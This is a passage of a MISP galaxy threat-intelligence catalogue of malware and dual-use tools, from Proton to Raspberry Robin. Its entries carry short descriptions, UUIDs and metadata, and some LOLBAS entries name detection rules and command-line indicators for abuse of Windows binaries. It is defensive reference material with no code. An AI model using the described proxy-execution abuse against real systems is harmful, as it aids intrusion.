UUID d3bcdbc4-5998-4e50-bd45-cba6a3278427
which can be used as unique global reference for Proton
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0279 |
source | MITRE |
type | ['malware'] |
Provlaunch
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Launcher process
Author: Grzegorz Tworek
Paths:
* c:\windows\system32\provlaunch.exe
Resources:
* https://twitter.com/0gtweet/status/1674399582162153472
Detection:
* Sigma: proc_creation_win_provlaunch_potential_abuse.yml
* Sigma: proc_creation_win_provlaunch_susp_child_process.yml
* Sigma: proc_creation_win_registry_provlaunch_provisioning_command.yml
* Sigma: registry_set_provisioning_command_abuse.yml
* IOC: c:\windows\system32\provlaunch.exe executions
* IOC: Creation/existence of HKLM\SOFTWARE\Microsoft\Provisioning\Commands subkeys
[Provlaunch.exe - LOLBAS Project]
Internal MISP references
UUID 83e1ac24-3928-40ba-b701-d72549a9430c
which can be used as unique global reference for Provlaunch
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5144 |
source | Tidal Cyber |
tags | ['9e5ec91c-0d0f-4e40-846d-d7b7eb941e17', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Proxysvc
Proxysvc is a malicious DLL used by Lazarus Group in a campaign known as Operation GhostSecret. It has appeared to be operating undetected since 2017 and was mostly observed in higher education organizations. The goal of Proxysvc is to deliver additional payloads to the target and to maintain control for the attacker. It is in the form of a DLL that can also be executed as a standalone process. [McAfee GhostSecret]
Internal MISP references
UUID 94f43629-243e-49dc-8c2b-cdf4fc15cf83
which can be used as unique global reference for Proxysvc
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0238 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
PS1
PS1 is a loader that was used to deploy 64-bit backdoors in the CostaRicto campaign.[BlackBerry CostaRicto November 2020]
Internal MISP references
UUID 8cd401ac-a233-4395-a8ae-d75db9d5b845
which can be used as unique global reference for PS1
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0613 |
source | MITRE |
type | ['malware'] |
PsExec
PsExec is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers.[Russinovich Sysinternals][SANS PsExec]
Internal MISP references
UUID 73eb32af-4bd3-4e21-8048-355edc55a9c6
which can be used as unique global reference for PsExec
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0029 |
source | MITRE |
tags | ['d903e38b-600d-4736-9e3b-cf1a6e436481', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'd819ae1a-e385-49fd-88d5-f66660729ecb', 'e1af18e3-3224-4e4c-9d0f-533768474508', '5cd85fec-0e37-4892-9cd2-bb8c70139072', '0d3ca5b9-2ea9-4daf-b3b5-11f1c6f9ebd3', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '950e8d3a-044b-43e3-b5db-bba61f70ff51', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Psr
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows Problem Steps Recorder, used to record screen and clicks.
Author: Leon Rodenko
Paths:
* c:\windows\system32\psr.exe
* c:\windows\syswow64\psr.exe
Detection:
* Sigma: proc_creation_win_psr_capture_screenshots.yml
* IOC: psr.exe spawned
* IOC: suspicious activity when running with "/gui 0" flag
[Psr.exe - LOLBAS Project]
Internal MISP references
UUID 1945584b-bb16-48a2-902d-2a1c9591efcd
which can be used as unique global reference for Psr
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5145 |
source | Tidal Cyber |
tags | ['08f4ef8d-94bb-42f7-b76d-71bcc809bcc9', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Psylo
Psylo is a shellcode-based Trojan that has been used by Scarlet Mimic. It has similar characteristics as FakeM. [Scarlet Mimic Jan 2016]
Internal MISP references
UUID 8c35d349-2f70-4edb-8668-e1cc2b67e4a0
which can be used as unique global reference for Psylo
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0078 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pteranodon
Pteranodon is a custom backdoor used by Gamaredon Group. [Palo Alto Gamaredon Feb 2017]
Internal MISP references
UUID 7fed4276-807e-4656-95f5-90878b6e2dbb
which can be used as unique global reference for Pteranodon
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0147 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pubprn
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Proxy execution with Pubprn.vbs
Author: Oddvar Moe
Paths:
* C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
* C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs
Resources:
* https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/
* https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
* https://github.com/enigma0x3/windows-operating-system-archaeology
Detection:
* BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
* Sigma: proc_creation_win_lolbin_pubprn.yml
[Pubprn.vbs - LOLBAS Project]
Internal MISP references
UUID 58883c83-d5be-42fc-b4bd-9287e55cd499
which can be used as unique global reference for Pubprn
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5260 |
source | Tidal Cyber |
tags | ['8177e8ac-f80d-477d-b0af-c2ea243ddf00', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
PULSECHECK
PULSECHECK is a web shell written in Perl that was used by APT5 as early as 2020, including against Pulse Secure VPNs at US Defense Industrial Base (DIB) companies.[Mandiant Pulse Secure Zero-Day April 2021]
Internal MISP references
UUID d777204c-f93c-54d9-b80e-41641a3d55ce
which can be used as unique global reference for PULSECHECK
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network', 'Linux'] |
software_attack_id | S1108 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pulseway
According to joint Cybersecurity Advisory AA23-320A (November 2023), Pulseway is a publicly available, legitimate tool that "enables remote monitoring and management of systems". According to the Advisory, Scattered Spider threat actors are known to abuse the tool during their intrusions.[U.S. CISA Scattered Spider November 16 2023]
Internal MISP references
UUID 74eb97b8-fc2c-41f0-b497-aad08a52777e
which can be used as unique global reference for Pulseway
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5068 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
PUNCHBUGGY
PUNCHBUGGY is a backdoor malware used by FIN8 that has been observed targeting POS networks in the hospitality industry.[Morphisec ShellTea June 2019][FireEye Fin8 May 2016][FireEye Know Your Enemy FIN8 Aug 2016]
Internal MISP references
UUID d8999d60-3818-4d75-8756-8a55531254d8
which can be used as unique global reference for PUNCHBUGGY
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0196 |
source | MITRE |
tags | ['6c6c0125-9631-4c2c-90ab-cfef374d5198'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
PUNCHTRACK
PUNCHTRACK is non-persistent point of sale (POS) system malware utilized by FIN8 to scrape payment card data.[FireEye Fin8 May 2016][FireEye Know Your Enemy FIN8 Aug 2016]
Internal MISP references
UUID 1638d99b-fbcf-40ec-ac48-802ce5be520a
which can be used as unique global reference for PUNCHTRACK
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0197 |
source | MITRE |
tags | ['6c6c0125-9631-4c2c-90ab-cfef374d5198'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pupy
Pupy is an open source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool. [GitHub Pupy] It is written in Python and can be generated as a payload in several different ways (Windows exe, Python file, PowerShell oneliner/file, Linux elf, APK, Rubber Ducky, etc.). [GitHub Pupy] Pupy is publicly available on GitHub. [GitHub Pupy]
Internal MISP references
UUID 0a8bedc2-b404-4a9a-b4f5-ff90ff8294be
which can be used as unique global reference for Pupy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Android', 'Windows'] |
software_attack_id | S0192 |
source | MITRE |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
PureCrypter
PureCrypter is a malware used for downloading/dropping purposes.
Internal MISP references
UUID a381cec1-9e87-415e-9025-a6e31fc8a48d
which can be used as unique global reference for PureCrypter
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5291 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '84615fe0-c2a5-4e07-8957-78ebc29b4635', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
PuTTy
PuTTy is an open-source SSH and telnet client.[PuTTY Download Page]
Internal MISP references
UUID 313c78e9-488d-4fbc-a6e5-05c0df3cb8a4
which can be used as unique global reference for PuTTy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5065 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
pwdump
pwdump is a credential dumper. [Wikipedia pwdump]
Internal MISP references
UUID 77f629db-d971-49d8-8b73-c7c779b7de3e
which can be used as unique global reference for pwdump
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0006 |
source | MITRE |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
PyDCrypt
PyDCrypt is malware written in Python designed to deliver DCSrv. It has been used by Moses Staff since at least September 2021, with each sample tailored for its intended victim organization.[Checkpoint MosesStaff Nov 2021]
Internal MISP references
UUID 51b2c56e-7d64-4e15-b1bd-45a980c9c44d
which can be used as unique global reference for PyDCrypt
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1032 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pysa
Pysa is a ransomware that was first used in October 2018 and has been seen to target particularly high-value finance, government and healthcare organizations.[CERT-FR PYSA April 2020]
Internal MISP references
UUID e0d5ecce-eca0-4f01-afcc-0c8e92323016
which can be used as unique global reference for Pysa
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0583 |
source | MITRE |
tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
QakBot
QakBot is a modular banking trojan that has been used primarily by financially-motivated actors since at least 2007. QakBot is continuously maintained and developed and has evolved from an information stealer into a delivery agent for ransomware, most notably ProLock and Egregor.[Trend Micro Qakbot December 2020][Red Canary Qbot][Kaspersky QakBot September 2021][ATT QakBot April 2021]
Internal MISP references
UUID 9050b418-5ffd-481a-a30d-f9059b0871ea
which can be used as unique global reference for QakBot
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0650 |
source | MITRE |
tags | ['d903e38b-600d-4736-9e3b-cf1a6e436481', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'd819ae1a-e385-49fd-88d5-f66660729ecb', '15787198-6c8b-4f79-bf50-258d55072fee', 'e096f0dd-fa2c-4771-8270-128c97c09f5b', 'e809d252-12cc-494d-94f5-954c49eb87ce'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Qilin Ransomware
Qilin (also known as Agenda) is a ransomware discovered in 2022. Attacks by threat actors deploying Qilin increased considerably in Q1 2024, impacting organizations in a wide range of sectors and locations across the globe.[Trend Micro March 26 2024]
The ransomware's capabilities have evolved over time, and multiple Qilin/Agenda variants and versions have been observed. The techniques featured in this object mainly derive from a variant observed in February 2024 written in the Rust programming language. A variant focused on encrypting Linux-based virtual machine servers can be found in the separate "Qilin Ransomware (Linux)" Software object.
Internal MISP references
UUID 3b78dda9-d273-4ffc-9a9f-75e80178c7b2
which can be used as unique global reference for Qilin Ransomware
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Linux', 'Windows'] |
software_attack_id | S5326 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', 'a2e000da-8181-4327-bacd-32013dbd3654', '562e535e-19f5-4d6c-81ed-ce2aec544f09', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Qilin Ransomware (Linux)
Qilin is a Linux-based ransomware. The malware is technically capable of running on Linux, FreeBSD, and VMware ESXi servers, but researchers have most often observed Qilin being used to encrypt virtual machines. Qilin users can use various flags to customize its capabilities. Qilin operators maintain a website where they threaten to leak data exfiltrated during their attacks, in an attempt to pressure victims into paying a ransom.[BleepingComputer 12 3 2023]
Internal MISP references
UUID 01a33c16-7eb3-4494-8c05-b163f871b951
which can be used as unique global reference for Qilin Ransomware (Linux)
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Linux'] |
software_attack_id | S5310 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', 'a2e000da-8181-4327-bacd-32013dbd3654', '562e535e-19f5-4d6c-81ed-ce2aec544f09', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
QUADAGENT
QUADAGENT is a PowerShell backdoor used by OilRig. [Unit 42 QUADAGENT July 2018]
Internal MISP references
UUID 2bf68242-1dbd-405b-ac35-330eda887081
which can be used as unique global reference for QUADAGENT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0269 |
source | MITRE |
tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
QuasarRAT
QuasarRAT is an open-source, remote access tool that has been publicly available on GitHub since at least 2014. QuasarRAT is developed in the C# language.[GitHub QuasarRAT][Volexity Patchwork June 2018]
Internal MISP references
UUID 4bab7c2b-5ec4-467e-8df4-f2e6996e136b
which can be used as unique global reference for QuasarRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0262 |
source | MITRE |
tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Quick Assist
Quick Assist is a built-in Windows utility that can be used to grant external users remote access to a particular system. Financially motivated adversaries abused Quick Assist during an April 2024 campaign that in some cases led to Black Basta ransomware deployment.[Microsoft Security Blog 5 15 2024]
Internal MISP references
UUID 9c4f3f26-c391-4b2c-9dd4-e4bb9bbc5ea3
which can be used as unique global reference for Quick Assist
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5319 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
QUIETCANARY
QUIETCANARY is a backdoor tool written in .NET that has been used since at least 2022 to gather and exfiltrate data from victim networks.[Mandiant Suspected Turla Campaign February 2023]
Internal MISP references
UUID 52d3515c-5184-5257-bf24-56adccb4cccd
which can be used as unique global reference for QUIETCANARY
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1076 |
source | MITRE |
type | ['malware'] |
QUIETEXIT
QUIETEXIT is a novel backdoor, based on the open-source Dropbear SSH client-server software, that has been used by APT29 since at least 2021. APT29 has deployed QUIETEXIT on opaque network appliances that typically don't support antivirus or endpoint detection and response tools within a victim environment.[Mandiant APT29 Eye Spy Email Nov 22]
Internal MISP references
UUID 947ab087-7550-577f-9ae9-5e82e9910610
which can be used as unique global reference for QUIETEXIT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network'] |
software_attack_id | S1084 |
source | MITRE |
tags | ['33d35d5e-f0cf-4c66-9be3-a3ffe6610b1a'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
QuietSieve
QuietSieve is an information stealer that has been used by Gamaredon Group since at least 2021.[Microsoft Actinium February 2022]
Internal MISP references
UUID dcdb74c5-4445-49bd-9f9c-236a7ecc7904
which can be used as unique global reference for QuietSieve
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0686 |
source | MITRE |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Quser
According to joint Cybersecurity Advisory AA23-250A (September 2023), Quser is "a valid program on Windows machines that displays information about user sessions on a Remote Desktop Session Host server".[U.S. CISA Zoho Exploits September 7 2023]
Internal MISP references
UUID 7b78eb31-f251-493b-8058-14a3452e8ccc
which can be used as unique global reference for Quser
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5053 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Raccoon Stealer 2.0
Raccoon Stealer is one of the most heavily used information & credential stealers ("infostealers") in recent years. The "2.0" version of Raccoon Stealer was observed in mid-2022, featuring new capabilities designed to improve its stealth.[Sekoia.io Raccoon Stealer June 28 2022] Raccoon Stealer is licensed as a service, and like many other modern infostealer families, the relatively low cost of a Raccoon Stealer subscription (around $75 for weeklong access) contributes to the malware's popularity. Victim credentials acquired via Raccoon Stealer are often resold on illicit, automated marketplaces on the dark web.
More details on the shifting infostealer landscape, the rising threat posed by infostealers to large and small organizations, and defending against top infostealer TTPs can be found in the Tidal Cyber blog series: Part 1 (https://www.tidalcyber.com/blog/big-game-stealing-part-1-the-infostealer-landscape-rising-infostealer-threats-to-businesses-w), Part 2 (https://www.tidalcyber.com/blog/big-game-stealing-part-2-defenses-for-top-infostealer-techniques).
Internal MISP references
UUID 7046193b-96c2-462b-9ba1-ea39a938e8e9
which can be used as unique global reference for Raccoon Stealer 2.0
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5070 |
source | Tidal Cyber |
tags | ['15787198-6c8b-4f79-bf50-258d55072fee', '4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Radmin
Radmin is a free remote desktop software application. It has been abused by cyber threat actors such as Akira ransomware operators to facilitate remote access into victim networks.[Sophos Akira May 9 2023]
Internal MISP references
UUID 33c0f985-3e1e-4901-bfee-d3c81bba0d71
which can be used as unique global reference for Radmin
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5281 |
source | Tidal Cyber |
tags | ['c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', 'e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Ragnar Locker
Ragnar Locker is a ransomware that has been in use since at least December 2019.[Sophos Ragnar May 2020][Cynet Ragnar Apr 2020]
Internal MISP references
UUID d25f7acd-a995-4b8b-8ffe-ccc9703cdf5f
which can be used as unique global reference for Ragnar Locker
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0481 |
source | MITRE |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '2feda37d-5579-4102-a073-aa02e82cb49f', 'cb5803f0-8ab4-4ada-8540-7758dfc126e2', '5e7433ad-a894-4489-93bc-41e90da90019', 'a2e000da-8181-4327-bacd-32013dbd3654', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Raindrop
Raindrop is a loader used by APT29 that was discovered on some victim machines during investigations related to the SolarWinds Compromise. It was discovered in January 2021 and was likely used since at least May 2020.[Symantec RAINDROP January 2021][Microsoft Deep Dive Solorigate January 2021]
Internal MISP references
UUID 80295aeb-59e3-4c5d-ac39-9879158f8d23
which can be used as unique global reference for Raindrop
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0565 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
RainyDay
RainyDay is a backdoor tool that has been used by Naikon since at least 2020.[Bitdefender Naikon April 2021]
Internal MISP references
UUID 42b775bd-0c1d-4ad3-8f7f-cbb0ba84e19e
which can be used as unique global reference for RainyDay
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0629 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Ramsay
Ramsay is an information stealing malware framework designed to collect and exfiltrate sensitive documents, including from air-gapped systems. Researchers have identified overlaps between Ramsay and the Darkhotel-associated Retro malware.[Eset Ramsay May 2020][Antiy CERT Ramsay April 2020]
Internal MISP references
UUID dc307b3c-9bc5-4624-b0bc-4807fa1fc57b
which can be used as unique global reference for Ramsay
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0458 |
source | MITRE |
type | ['malware'] |
RansomHub (Payload)
This object represents the techniques associated with the payload binary used in attacks associated with the RansomHub ransomware-as-a-service ("RaaS") operation. The RansomHub gang is suspected of leaking victim data exfiltrated in attacks by other groups, but researchers have also observed an apparent original ransomware payload linked to the group.[BroadcomSW June 5 2024][The Record RansomHub June 3 2024] This payload displays a high degree of code similarity with Knight ransomware, whose source code was offered for sale in cybercriminal forums in February 2024.[BroadcomSW June 5 2024]
Internal MISP references
UUID a3044fb5-3aae-4590-b589-cc88bf0d1f34
which can be used as unique global reference for RansomHub (Payload)
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5325 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '89c5b94b-ecf4-4d53-9b74-3465086d4565', '562e535e-19f5-4d6c-81ed-ce2aec544f09', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
RAPIDPULSE
RAPIDPULSE is a web shell that exists as a modification to a legitimate Pulse Secure file that has been used by APT5 since at least 2021.[Mandiant Pulse Secure Update May 2021]
Internal MISP references
UUID 129abb68-7992-554e-92fa-fa376279c0b6
which can be used as unique global reference for RAPIDPULSE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network', 'Linux'] |
software_attack_id | S1113 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
RARSTONE
RARSTONE is malware used by the Naikon group that has some characteristics similar to PlugX. [Aquino RARSTONE]
Internal MISP references
UUID a9c9fda8-c156-44f2-bc7e-1b696f3fbaa2
which can be used as unique global reference for RARSTONE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0055 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Rasautou
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows Remote Access Dialer
Author: Tony Lambert
Paths: * C:\Windows\System32\rasautou.exe
Resources: * https://github.com/fireeye/DueDLLigence * https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html
Detection: * Sigma: win_rasautou_dll_execution.yml * IOC: rasautou.exe command line containing -d and -p[Rasautou.exe - LOLBAS Project]
Internal MISP references
UUID 8d34715e-1018-40fc-bf09-4eca69be830e
which can be used as unique global reference for Rasautou
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5146 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Raspberry Robin
A highly active worm that spreads through removable media devices and abuses built-in Windows utilities after initial infection of the host. Raspberry Robin has evolved into a major malware delivery threat, with links to infections involving Cobalt Strike, SocGholish, Truebot, and ultimately ransomware.[Microsoft Security Raspberry Robin October 2022]
Delivers: Cobalt Strike[Microsoft Security Raspberry Robin October 2022], SocGholish[Microsoft Security Raspberry Robin October 2022], Truebot[Microsoft Security Raspberry Robin October 2022][U.S. CISA Increased Truebot Activity July 6 2023]
Malpedia (Research): https://malpedia.caad.fkie.fraunhofer.de/details/win.raspberry_robin
Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/raspberryrobin/
PulseDive (IOCs): https://pulsedive.com/threat/Raspberry%20Robin
Internal MISP references
UUID dc0dbd15-0916-43c7-a3b9-6dc3ce0771be
which can be used as unique global reference for Raspberry Robin
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5002 |
source | Tidal Cyber |
tags | ['1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', 'e809d252-12cc-494d-94f5-954c49eb87ce'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
RATANKBA
